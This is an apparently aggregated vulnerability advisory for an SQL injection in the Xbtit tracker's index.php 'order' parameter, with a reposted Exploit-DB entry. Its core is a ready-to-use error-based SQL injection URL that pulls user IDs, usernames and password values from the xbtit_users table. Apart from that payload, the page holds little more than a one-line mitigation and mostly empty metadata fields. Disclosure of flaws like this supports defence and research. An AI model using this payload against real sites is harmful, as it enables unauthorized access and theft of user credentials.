Xbtit SQL Injection Vulnerability

vendor:

Xbtit

by:

Ctacok

8,8

CVSS

HIGH

SQL Injection

CWE

Product Name: Xbtit

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: No

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2020

Xbtit SQL Injection Vulnerability

Xbtit is vulnerable to a SQL injection vulnerability in the 'index.php' page. An attacker can exploit this vulnerability by sending a specially crafted SQL query to the vulnerable page. The query will return the first user's ID, username, and password from the 'xbtit_users' table. The query is sent via the 'order' parameter in the URL.

Mitigation:

To mitigate this vulnerability, input validation should be performed on all user-supplied data.

Source

Exploit-DB raw data:

####################################################
# Title     : Xbtit SQL Injection Vulnerability    #
# Author    : Ctacok                               #
# Homepage  : http://ctacok.ru/                    #
####################################################
   
####################################################
#  Vulnerable File : 
 /index.php?page=users&order=[SQL]&by=ASC
   
####################################################
#  ExploiT         : 
   
/index.php?page=users&order=flag+or(1,1)=(select+count(0),concat((select+concat(0x3a3a3a,id,0x3a,username,0x3a,password,0x3a3a3a)+from+xbtit_users+limit+1,1),floor(rand(0)*2))from(information_schema.tables)group+by+2)--++&by=ASC

####################################################